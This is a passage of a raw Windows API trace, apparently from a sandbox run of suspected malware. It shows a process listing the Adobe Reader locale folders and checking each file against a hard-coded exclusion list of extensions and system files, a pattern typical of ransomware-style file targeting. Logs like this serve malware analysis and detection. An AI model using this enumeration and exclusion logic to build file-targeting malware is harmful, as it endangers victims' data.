returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="WEBLINK.TUR", cchCount2=11) returned 1 [0058.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="WEBLINK.TUR", cchCount2=11) returned 3 [0058.597] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830ff2a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.TUR", cAlternateFileName="")) returned 0 [0058.598] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.598] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832a21c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk_UA", cAlternateFileName="")) returned 1 [0058.598] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832a21c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.600] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832a21c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.600] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db4daa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility.UKR", cAlternateFileName="ACCESS~1.UKR")) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="UKR", cchCount2=3) returned 3 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.600] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="UKR", cchCount2=3) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ACCESSIBILITY.UKR", cchCount2=17) returned 3 [0058.601] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x65600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.UKR", cAlternateFileName="")) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.601] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="UKR", cchCount2=3) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="UKR", cchCount2=3) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="UKR", cchCount2=3) returned 1 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACROFORM.UKR", cchCount2=12) returned 3 [0058.602] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d0fa60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.UKR", cAlternateFileName="ADOBEC~1.UKR")) returned 1 [0058.602] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7aa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.UKR", cAlternateFileName="")) returned 1 [0058.602] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820a1b60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.UKR", cAlternateFileName="BRDLAN~1.UKR")) returned 1 [0058.602] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83255f00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db27940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MakeAccessible.UKR", cAlternateFileName="MAKEAC~1.UKR")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d795840, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.UKR", cAlternateFileName="MULTIM~1.UKR")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db017e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDDom.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807571a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8327c060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.UKR", cAlternateFileName="READOU~1.UKR")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dadb680, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reflow.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dab5520, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.UKR", cAlternateFileName="SAVEAS~1.UKR")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830b2fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x830d9140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.UKR", cAlternateFileName="")) returned 1 [0058.603] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.603] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, 